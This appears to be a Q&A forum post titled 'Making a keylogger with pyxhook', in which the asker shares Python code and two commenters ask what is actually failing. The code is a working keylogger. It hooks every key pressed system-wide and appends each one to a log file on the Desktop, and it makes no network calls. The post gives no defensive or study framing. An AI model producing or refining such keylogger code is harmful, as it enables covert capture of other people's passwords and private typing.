# Making a keylogger with pyxhook

Tags: python, keylogger

I am trying to make a key logger

```
import os
import pyxhook
  
log_file = os.environ.get(
    'pylogger_file',
    os.path.expanduser('~/Desktop/file.log')
)

cancel_key = ord(
    os.environ.get(
        'pylogger_cancel',
        '`'
    )[0]
)
  
if os.environ.get('pylogger_clean', None) is not None:
    try:
        os.remove(log_file)
    except EnvironmentError:
       
        pass
  
def OnKeyPress(event):
    with open(log_file, 'a') as f:
        f.write('{}\n'.format(event.Key))
 
new_hook = pyxhook.HookManager()
new_hook.KeyDown = OnKeyPress

new_hook.HookKeyboard()
try:
    new_hook.start()        
except KeyboardInterrupt:
    
    pass
except Exception as ex:
   
    msg = 'Error while catching events:\n  {}'.format(ex)
    pyxhook.print_err(msg)
    with open(log_file, 'a') as f:
        f.write('\n{}'.format(msg))
```

Comment: Can you provide details on what isn't working? Is it catching keypresses when the window is focused? Is it terminating immediately? Do you have an error? etc. Please see [how to ask a good question](https://stackoverflow.com/help/how-to-ask) and include some more details so we can help you better

Comment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.